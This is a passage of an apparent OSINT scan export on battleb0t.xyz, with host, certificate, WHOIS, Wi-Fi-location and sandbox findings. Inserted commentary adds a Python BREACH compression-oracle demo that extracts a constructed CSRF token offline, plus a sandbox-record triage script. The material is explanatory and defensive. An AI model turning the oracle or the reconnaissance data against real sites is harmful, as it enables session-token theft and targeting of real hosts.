47:42:3f:43:61:57:3a:c1:fd:4a:c1:60:c0:f5:9f:e5:3f:aa:
cd:53:b5:a3:5d:e8:f4:0a:26:e5:70:df:34:b0:ae:1c:99:2a:
3c:31:a1:a9:06:b4:05:fd:9b:44:cb:42:87:c4:a0:d2:e7:7a:
95:fc:6a:ad:e6:f1:50:0d:21:cd:f5:24:0f:dc:98:36:59:3b:
40:6e:0f:4b:38:de:68:41:9a:1e:f9:be:5b:6a:36:f0:9b:22:
e3:a1:e1:ad:96:f6:ba:a2:d1:f4:e2:12:cb:ab:1f:bb:9a:53:
07:6b:08:bd:4c:58:68:74:4f:75:3c:83:28:de:71:51:c8:1c:
8f:ca:5e:df:81:b4:f2:74:1f:18:af:29:fa:69:d6:b5:65:a9:
11:13:ef:a4
| battleb0t.xyz |
| 2023-05-12 02:55:11 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 87.248.157.102:2083 | 87.248.157.102 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 10:37:58 (Net ID: 00:02:2D:28:06:03) | 37.7642, -122.3993 |
| 2023-05-12 02:44:09 | Co-Hosted Site - Domain Name | No | SSL Certificate Analyzer | 2 | 1 | 1 | 0 | None | github.io | battleb0t.xyz |
| 2023-05-12 02:44:17 | IPv6 Address | No | DNS Resolver | 0 | 0 | 3 | 0 | None | 2606:50c0:8002::153 | www.battleb0t.xyz |
| 2023-05-12 02:56:57 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | fluid.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:c7:00:14:21:71:88:e2:18:10:f8:e3:ee:d1:89:37:10:7b
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 27 01:46:47 2022 GMT
Not After : Mar 27 01:46:46 2023 GMT
Subject: CN=fluid.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:ca:91:c0:24:2c:ac:ca:ae:72:a2:1c:76:2b:73:
ee:03:78:0b:80:eb:3e:1e:2f:33:3d:ee:c9:08:d3:
24:62:ca:69:54:4a:4f:62:ee:85:3e:9e:5e:5f:d1:
1f:ab:8a:39:77:32:f2:c3:16:74:4d:2e:2a:61:7c:
7c:02:16:fd:f8:90:cd:06:b2:e9:f4:43:77:1b:75:
bb:be:c8:56:44:f6:50:11:ac:06:ec:e8:59:ef:64:
25:2f:4d:3f:96:fc:de:28:67:0a:4e:3f:7e:0e:35:
82:50:a2:e2:53:60:28:9a:07:c8:48:6d:b6:14:30:
5d:26:53:a7:34:c5:04:39:e7:67:e1:8b:e5:5d:a5:
3a:24:32:e3:b6:35:44:1a:60:82:6c:43:b7:4d:91:
70:e8:77:c6:32:fc:99:9f:ad:b8:12:75:4d:70:f3:
52:73:ab:3d:62:1e:0f:a1:00:40:14:f2:ee:4f:92:
e4:8c:8a:19:22:54:b9:c3:71:e1:6b:29:43:5b:56:
a9:e7:cc:16:78:2e:25:bc:fa:16:51:9d:87:b3:64:
aa:85:a8:c4:c7:1b:38:de:e1:9c:ae:93:7d:3f:98:
02:a9:aa:fa:8c:80:52:99:2e:98:ff:77:3d:76:8b:
8f:32:cd:03:00:51:9a:81:df:0d:68:7a:8d:16:fa:
b6:b1
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
6C:34:7D:03:48:53:73:CF:0D:0C:39:44:A5:D1:A0:E8:F3:90:7F:11
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:fluid.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
3e:fe:f9:21:a8:b9:ff:5b:d7:4e:56:e9:01:36:22:e4:80:7b:
32:28:4f:35:ce:d9:fe:79:61:21:91:08:a4:5a:99:cb:49:8d:
59:33:d8:1c:63:9a:1f:c2:49:d5:16:41:55:df:2b:23:f2:e9:
b3:cc:0e:45:14:b2:fe:94:7d:98:ee:51:3e:fe:8e:d3:e9:26:
e4:d9:13:e1:5b:9d:72:18:78:d0:8e:68:17:2a:3e:77:ec:ab:
7d:44:bc:01:fc:dc:0f:8f:d3:cb:10:ee:22:15:6e:05:13:f7:
e6:22:b4:eb:f4:fb:8e:2b:69:d7:32:d7:d5:70:69:43:51:d5:
4b:6b:0b:f8:e5:1a:2e:d7:2d:1d:78:46:8f:ca:f0:7d:23:fd:
88:d0:03:3c:9a:6c:c7:d3:59:0a:bf:a1:53:93:a9:52:44:05:
4e:9a:e7:34:e3:cf:4e:d3:8f:b2:a4:32:fc:7a:56:50:19:02:
1d:b0:d0:f6:ba:1e:0f:f4:0e:1e:fe:53:40:02:f1:88:3c:f3:
9b:b6:f5:bd:4d:b4:cd:f4:5c:5c:d1:5e:1f:d8:bc:e4:0a:75:
d6:3d:a2:7f:13:a1:4d:66:3a:7b:eb:4a:cf:7e:00:5d:ee:3b:
c3:4d:5a:49:d1:0b:e5:67:dc:0a:d3:3c:d7:f1:60:9d:30:79:
0a:39:a4:60
|
| 2023-05-12 02:44:13 | IP Address | No | DNS Resolver | 107 | 0 | 1 | 0 | None | 185.199.109.153 | battleb0t.xyz |
| 2023-05-12 03:08:50 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 35.229.48.124 | 35.229.48.116 |
| 2023-05-12 03:00:50 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 000.github.io | 185.199.111.153 |
| 2023-05-12 02:58:43 | Vulnerability - CVE Medium | Yes | Tool - testssl.sh | 0 | 2 | 1 | 0 | None | CVE-2013-3587
https://nvd.nist.gov/vuln/detail/CVE-2013-3587
Score: 5.9
Description: The HTTPS protocol, as used in unspecified web applications, can encrypt compressed data without properly obfuscating the length of the unencrypted data, which makes it easier for man-in-the-middle attackers to obtain plaintext secret values by observing length differences during a series of guesses in which a string in an HTTP request URL potentially matches an unknown string in an HTTP response body, aka a "BREACH" attack, a different issue than CVE-2012-4929. | ayhu.xyz |
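The CVE text above is the BREACH mechanism in one sentence: when a response is compressed before it is encrypted, an attacker-reflected guess that shares a prefix with a secret in the same body collapses into one LZ77 back-reference, so the ciphertext gets shorter by a byte for every correct character, and a passive observer only needs the lengths. testssl.sh raises this finding whenever HTTP compression is enabled on the host; it is exploitable only where a response both reflects attacker input and carries a secret (a CSRF token, a session value), and the fix is to disable compression for such responses or to mask the secret per request. The simulation below is an added example, not scan output or testssl.sh code: the page template, the token `7f3a9c1e`, the hex alphabet and the `name='token' value='` context the attacker is assumed to have seen once are all constructed for the demo, and `Z_FIXED` forces static Huffman tables so that each leaked character is exactly one byte of output (servers normally use dynamic tables, which blur the signal by a byte; the BREACH authors handle that with repeated, padding-aligned measurements).

```python
"""BREACH-style compression oracle, simulated offline against a constructed page."""
import zlib

# Constructed for this example (not taken from the scan): the secret an
# attacker wants, the alphabet it is drawn from, and the page bytes that
# precede it. The attacker is assumed to have seen the page layout once.
SECRET_TOKEN = "7f3a9c1e"
ALPHABET = "0123456789abcdef"
CONTEXT = "name='token' value='"  # known prefix, gives DEFLATE a >= 3-byte match to extend


def render_response(reflected: str, token: str = SECRET_TOKEN) -> bytes:
    """Constructed vulnerable response: reflects attacker input, embeds the secret."""
    return (
        "<html><body>"
        f"<p>Search results for: {reflected}</p>"
        "<form action='/transfer' method='post'>"
        f"<input type='hidden' name='token' value='{token}'>"
        "</form></body></html>"
    ).encode()


def compressed_size(reflected: str, token: str = SECRET_TOKEN) -> int:
    """Length a passive observer sees when the body is DEFLATE-compressed, then encrypted.

    Z_FIXED selects static Huffman tables, so absorbing one more byte into the
    LZ77 match shortens the output by exactly one byte. Servers normally use
    dynamic tables, which blur this by +/-1 byte; BREACH handles that with
    repeated, padding-aligned measurements.
    """
    comp = zlib.compressobj(9, zlib.DEFLATED, 15, 8, zlib.Z_FIXED)
    return len(comp.compress(render_response(reflected, token)) + comp.flush())


def uncompressed_size(reflected: str, token: str = SECRET_TOKEN) -> int:
    """Mitigated server (compression disabled): length no longer depends on the guess."""
    return len(render_response(reflected, token))


def recover_token(oracle=compressed_size, max_len: int = 64) -> str:
    """Recover the secret one character per round from response lengths alone."""
    known = ""
    while len(known) < max_len:
        sizes = {c: oracle(CONTEXT + known + c) for c in ALPHABET}
        shortest = min(sizes.values())
        winners = [c for c, n in sizes.items() if n == shortest]
        if len(winners) != 1:
            # All guesses compress equally: the back-reference cannot be
            # extended any further (end of secret), or there is no oracle.
            break
        known += winners[0]
    return known


if __name__ == "__main__":
    print("with compression   :", recover_token(compressed_size))
    print("without compression:", repr(recover_token(uncompressed_size)))
```

With the compressing oracle the loop walks the token out character by character; with `uncompressed_size` it stops in the first round because every guess yields the same length. That equal-length behaviour across all guesses is the check to make after applying a mitigation, and it is also why the verifier in a scanner only reports "compression enabled" rather than proving extraction.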
| 2023-05-12 03:31:33 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | abuse@namecheap.com | Domain Name: ASHU.XYZ
Registry Domain ID: D279374777-CNIC
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: https://namecheap.com
Updated Date: 2023-03-28T08:17:54.0Z
Creation Date: 2022-03-03T09:34:10.0Z
Registry Expiry Date: 2024-03-03T23:59:59.0Z
Registrar: Namecheap
Registrar IANA ID: 1068
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant State/Province: Capital Region
Registrant Country: IS
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: GRACE.NS.CLOUDFLARE.COM
Name Server: LOGAN.NS.CLOUDFLARE.COM
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.9854014545
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T03:17:37.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain name: ashu.xyz
Registry Domain ID: D279374777-CNIC
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: http://www.namecheap.com
Updated Date: 2023-02-22T23:31:01.00Z
Creation Date: 2022-03-03T09:34:10.00Z
Registrar Registration Expiration Date: 2024-03-03T23:59:59.00Z
Registrar: NAMECHEAP INC
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.9854014545
Reseller: NAMECHEAP INC
Domain Status: serverTransferProhibited https://icann.org/epp#serverTransferProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID:
Registrant Name: Redacted for Privacy
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant Street: Kalkofnsvegur 2
Registrant City: Reykjavik
Registrant State/Province: Capital Region
Registrant Postal Code: 101
Registrant Country: IS
Registrant Phone: +354.4212434
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: 4f516d38c2f942669e9c1663e414ae75.protect@withheldforprivacy.com
Registry Admin ID:
Admin Name: Redacted for Privacy
Admin Organization: Privacy service provided by Withheld for Privacy ehf
Admin Street: Kalkofnsvegur 2
Admin City: Reykjavik
Admin State/Province: Capital Region
Admin Postal Code: 101
Admin Country: IS
Admin Phone: +354.4212434
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: 4f516d38c2f942669e9c1663e414ae75.protect@withheldforprivacy.com
Registry Tech ID:
Tech Name: Redacted for Privacy
Tech Organization: Privacy service provided by Withheld for Privacy ehf
Tech Street: Kalkofnsvegur 2
Tech City: Reykjavik
Tech State/Province: Capital Region
Tech Postal Code: 101
Tech Country: IS
Tech Phone: +354.4212434
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: 4f516d38c2f942669e9c1663e414ae75.protect@withheldforprivacy.com
Name Server: grace.ns.cloudflare.com
Name Server: logan.ns.cloudflare.com
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-11T07:17:37.40Z <<<
For more information on Whois status codes, please visit https://icann.org/epp |
| 2023-05-12 02:55:05 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 188.114.97.1:2052 | 188.114.97.1 |
| 2023-05-12 02:54:30 | Physical Location | No | Censys | 1 | 0 | 3 | 0 | None | Frankfurt am Main, Hesse, 60306, Germany, Europe | 64.226.81.43 |
| 2023-05-12 02:45:10 | Raw Data from RIRs | No | Hybrid Analysis | 1 | 0 | 1 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'https://zip.co/us/quadpay-terms-of-service', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'http://bcpzonasegurabeta.viabcp.com', u'type': u'extracted', u'verdict': u'malicious'}]}, u'total_processes': 21, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'http://kekw.battleb0t.xyz/jar', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:7052:120:WilError_01"\n "InternetShortcutMutex"\n "Local\\SM0:348:120:WilError_01"\n "SM0:348:120:WilError_01"\n "SM0:348:304:WilStaging_02"\n "Local\\SM0:348:304:WilStaging_02"\n "SM0:7052:120:WilError_01"\n "SM0:7052:304:WilStaging_02"\n "Local\\SM0:7052:120:WilError_01"\n "Local\\SM0:7052:304:WilStaging_02"\n "ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:7052:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:7052:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:7052:120:WilError_01"'}, {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-220', u'name': u'Executes batch file', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1059', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1059', u'relevance': 3, u'threat_level': 0, u'type': 9, u'description': u'Process "msedge.exe" with commandline "--single-argument http://kekw.battleb0t.xyz/jar" (UID: 
00000000-00007052)'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"64.226.81.43:49750"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"kekw.battleb0t.xyz"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Asset Store\\assets.db\\000003.log]- [targetUID: 00000000-00007052]\n "safety_tips.pb" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\SafetyTips\\2844\\safety_tips.pb]- [targetUID: 00000000-00007052]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00007052]\n "Session_13324411891984663" has type "data"- [targetUID: N/A]\n "manifest.fingerprint" has type "ASCII text with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Edge Shopping\\2.0.2353.0\\manifest.fingerprint]- [targetUID: 00000000-00007052]\n "c920e640-3cd4-4291-b5a7-5ed9af660f2d.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- [targetUID: 
N/A]\n "ae4685c3-b06f-45e7-8054-1aa0597e7deb.tmp" has type "very short file (no magic)"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\ae4685c3-b06f-45e7-8054-1aa0597e7deb.tmp]- [targetUID: 00000000-00007052]\n "8c133cbc-cb4f-4494-9a53-681a41c38ec8.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\8c133cbc-cb4f-4494-9a53-681a41c38ec8.tmp]- [targetUID: 00000000-00007052]\n "settings.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Crashpad\\settings.dat]- [targetUID: 00000000-00007052]\n "Last Browser" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Last Browser]- [targetUID: 00000000-00007052]\n "manifest.json" has type "JSON data"- Location: [%TEMP%\\7052_1944693387\\manifest.json]- [targetUID: 00000000-00007052]\n "product_page.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\7052_1268572528\\product_page.js]- [targetUID: 00000000-00007052]\n "1200c81a-5f8f-40d4-9791-b368d00c99a1.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\1200c81a-5f8f-40d4-9791-b368d00c99a1.tmp]- [targetUID: 00000000-00007052]\n "Tabs_13324411893998198" has type "data"- [targetUID: N/A]\n "643a517a-ab51-4a47-a7fa-e8480b929b43.tmp" has type "ASCII text with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\643a517a-ab51-4a47-a7fa-e8480b929b43.tmp]- [targetUID: 00000000-00007052]\n "LOG" has type "ASCII text"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\EdgePushStorageWithConnectTokenAndKey\\LOG]- [targetUID: 00000000-00007052]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': 
None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "http://www.w3.org/2000/svg"\n Pattern match: "https://easylist.to/"\n Pattern match: "https://github.com/easylist"\n Pattern match: "http://kekw.battleb0t.xyz/jar"\n Pattern match: "Math.PI/180"\n Pattern match: "https://creativecommons.org/"\n Pattern match: "http://kekw.battleb0t.xyz"\n Pattern match: "https://creativecommons.org/compatiblelicenses"\n Pattern match: "https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4wtc3?ver=79e5,PORTRAIT:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4wqHh?ver=0f07,copyright:Yuanping"\n Pattern match: "www.playstation.com},{applied_policy:block,domain:bing.com},{applied_policy:block,domain:browserbench.org},{applied_policy:block,domain:www.principledtechnologies.com},{applied_policy:block,domain:web.basemark.com},{applie"\n Pattern match: "https://*excel.officeapps.live.com/*,https://*onenote.officeapps.live.com/*,https://*powerpoint.officeapps.live.com/*,https://*word-edit.officeapps.live.com/*,https://*excel.partner.officewebapps.cn/*,https://*onenote.partner.officewebapps.cn/*,"\n Pattern match: "kekw.battleb0t.xyz/jar"\n Pattern match: "http://schemas.microsoft.com/SMI/2005/WindowsSettings"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-40', u'name': u'Drops script (vb/js) files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 1, u'type': 8, u'description': u'"product_page.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\7052_1268572528\\product_page.js]- [targetUID: 00000000-00007052]\n "shoppingfre.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: 
[%TEMP%\\7052_1268572528\\shoppingfre.js]- [targetUID: 00000000-00007052]\n "edge_driver.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Edge Shopping\\2.0.2353.0\\edge_driver.js]- [targetUID: 00000000-00007052]\n "edge_checkout_page_validator.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\7052_1268572528\\edge_checkout_page_validator.js]- [targetUID: 00000000-00007052]\n "adblock_snippet.js" has type "ASCII text with very long lines with no line terminators"- Location: [%TEMP%\\7052_16790919\\adblock_snippet.js]- [targetUID: 00000000-00007052]\n "auto_open_controller.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\7052_1268572528\\auto_open_controller.js]- [targetUID: 00000000-00007052]\n "edge_confirmation_page_validator.js" has type "Unknown"- Location: [%TEMP%\\7052_1268572528\\edge_confirmation_page_validator.js]- [targetUID: 00000000-00007052]\n "shopping.js" has type "Unknown"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Edge Shopping\\2.0.2353.0\\shopping.js]- [targetUID: 00000000-00007052]\n "edge_tracking_page_validator.js" has type "Unknown"- Location: [%TEMP%\\7052_1268572528\\edge_tracking_page_validator.js]- [targetUID: 00000000-00007052]\n "shopping_iframe_driver.js" has type "Unknown"- Location: [%TEMP%\\7052_1268572528\\shopping_iframe_driver.js]- [targetUID: 00000000-00007052]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-14', u'name': u'Found potential IP address in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 1, u'type': 2, u'description': u'Potential IP "3.0.0.8" found in string ""version": "3.0.0.8""\n Potential IP "10.34.0.45" found in string "%LOCALAPPDATA%\\Microsoft\\Edge\\User 
Data\\Subresource Filter\\Indexed Rules\\35\\10.34.0.45"\n Potential IP "10.34.0.45" found in string "%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Unindexed Rules\\10.34.0.45\\LICENSE"\n Potential IP "3.0.0.8" found in string "\xef\xbb\xbf{ "description": "AutofillCore data component", "name": "AutofillCore", "version": "3.0.0.8"}"\n Potential IP "5.1.0.0 | battleb0t.xyz |
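The Hybrid Analysis cell above is a sandbox report that SpiderFoot stored as a Python 2 repr (u'...' strings, None) rather than JSON, and its signatures describe Microsoft Edge opening http://kekw.battleb0t.xyz/jar: the monitored process is msedge.exe, the "dropped" and "suspicious" script files sit under Edge's own User Data and Edge Shopping component paths, and threat_score is None. The indicators worth keeping are the contacted host 64.226.81.43:49750 and the DNS query for kekw.battleb0t.xyz, which the Censys record further down ties to that same IP. The helper below is an added example, not SpiderFoot or Hybrid Analysis code; its RAW_RECORD is a trimmed reconstruction in the same shape as the cell above, and it decodes either JSON or the Python repr (with ast.literal_eval, never eval) before pulling out hosts, DNS names, ATT&CK IDs and any signature rated above informative.

```python
"""Triage helper for sandbox records as SpiderFoot stores them in a scan export."""
import ast
import json
import re

# Constructed excerpt: a trimmed reconstruction of the Hybrid Analysis cell
# above, in the same Python 2 repr shape (u'' strings, None; not JSON).
RAW_RECORD = r"""[{u'subsystem': None, u'classification_tags': [],
 u'crowdstrike_ai': {u'executable_process_memory_analysis': [],
  u'analysis_related_urls': [
   {u'url': u'https://zip.co/us/quadpay-terms-of-service', u'type': u'extracted', u'verdict': u'suspicious'},
   {u'url': u'http://bcpzonasegurabeta.viabcp.com', u'type': u'extracted', u'verdict': u'malicious'}]},
 u'total_processes': 21, u'threat_score': None, u'environment_id': 160,
 u'submit_name': u'http://kekw.battleb0t.xyz/jar',
 u'signatures': [
  {u'identifier': u'target-220', u'name': u'Executes batch file', u'attck_id': u'T1059',
   u'threat_level_human': u'informative', u'threat_level': 0,
   u'description': u'Process "msedge.exe" with commandline "--single-argument http://kekw.battleb0t.xyz/jar"'},
  {u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id': u'T1071',
   u'threat_level_human': u'informative', u'threat_level': 0, u'description': u'"64.226.81.43:49750"'},
  {u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id': u'T1071.004',
   u'threat_level_human': u'informative', u'threat_level': 0, u'description': u'"kekw.battleb0t.xyz"'},
  {u'identifier': u'binary-40', u'name': u'Drops script (vb/js) files', u'attck_id': u'T1105',
   u'threat_level_human': u'suspicious', u'threat_level': 1,
   u'description': u'"product_page.js" has type "UTF-8 Unicode text"- Location: [%TEMP%\\7052_1268572528\\product_page.js]'}]}]"""

IP_PORT = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3}):(\d{1,5})\b")
QUOTED = re.compile(r'"([^"]+)"')


def parse_raw(raw: str):
    """Decode a raw-data cell: JSON where the module emitted JSON (Censys does),
    otherwise a safe literal parse of the Python repr. Never eval()."""
    try:
        return json.loads(raw)
    except ValueError:
        return ast.literal_eval(raw)


def summarize(raw: str) -> dict:
    """Pull network indicators, ATT&CK IDs and non-informative signatures
    out of a list of sandbox reports."""
    summary = {"submitted": [], "contacted": [], "dns": [], "techniques": set(),
               "flagged": [], "urls": {}, "max_threat_level": 0}
    for report in parse_raw(raw):
        summary["submitted"].append(report.get("submit_name"))
        ai = report.get("crowdstrike_ai") or {}
        for item in ai.get("analysis_related_urls") or []:
            summary["urls"][item["url"]] = item["verdict"]
        for sig in report.get("signatures") or []:
            desc = sig.get("description") or ""
            name = sig.get("name")
            if sig.get("attck_id"):
                summary["techniques"].add(sig["attck_id"])
            if name == "Contacts server":
                summary["contacted"].extend(f"{ip}:{port}" for ip, port in IP_PORT.findall(desc))
            elif name == "Queries DNS server":
                summary["dns"].extend(QUOTED.findall(desc))
            level = sig.get("threat_level") or 0
            summary["max_threat_level"] = max(summary["max_threat_level"], level)
            if level >= 1:  # anything above 'informative' deserves a human look
                summary["flagged"].append((sig.get("threat_level_human"), name, sig.get("identifier")))
    summary["techniques"] = sorted(summary["techniques"])
    return summary


if __name__ == "__main__":
    for key, value in summarize(RAW_RECORD).items():
        print(f"{key:17}: {value}")
```

The one "suspicious" hit it surfaces is the Edge Shopping script drop, so the analyst sees immediately that the rating comes from the browser, not from the URL; the contacted IP and DNS name are what feed the rest of the scan.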
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 7567 3371 (Net ID: 00:00:C5:F7:76:3C) | 41.8781, -87.6298 |
| 2023-05-12 02:56:52 | Internet Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | nwapi.battleb0t.xyz | [{"url": "https://nwapi.battleb0t.xyz", "firewall": "Cloudflare", "detected": true, "manufacturer": "Cloudflare Inc."}, {"url": "https://nwapi.battleb0t.xyz", "firewall": "None", "detected": false, "manufacturer": "None"}] |
| 2023-05-12 02:46:17 | Affiliate Description - Category | No | DuckDuckGo | 0 | 0 | 3 | 0 | None | Cross-platform software | cdn-185-199-111-153.github.com |
| 2023-05-12 03:34:36 | BGP AS Membership | No | RIPE | 0 | 0 | 4 | 0 | None | 44486 | 45.131.109.0/24 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | default (Net ID: 00:11:6B:13:88:06) | 50.8897, 6.0563 |
| 2023-05-12 03:04:46 | Hosting Provider | No | Hosting Provider Identifier | 0 | 0 | 3 | 0 | None | PEER 1: http://www.peer1.com/ | 64.226.81.43 |
